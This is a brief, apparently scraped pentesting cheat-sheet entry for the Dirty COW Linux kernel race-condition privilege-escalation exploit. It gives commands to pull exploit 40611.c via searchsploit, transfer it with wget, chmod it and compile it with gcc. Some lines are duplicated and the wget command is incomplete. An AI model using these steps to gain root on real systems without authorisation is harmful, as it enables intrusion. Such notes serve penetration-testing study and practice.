Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
Unstable, might need to compile from host if gcc is not present on target
Last updated
Unstable, might need to compile from host if gcc is not present on target
Last updated
sudo searchsploit -m linux/local/40611.c #wget the exploit to target wget #Change permissions chmod +x 40611.c #Compile compile on kali before exfil to target gcc -pthread 40611.c -o exploit -lcrypt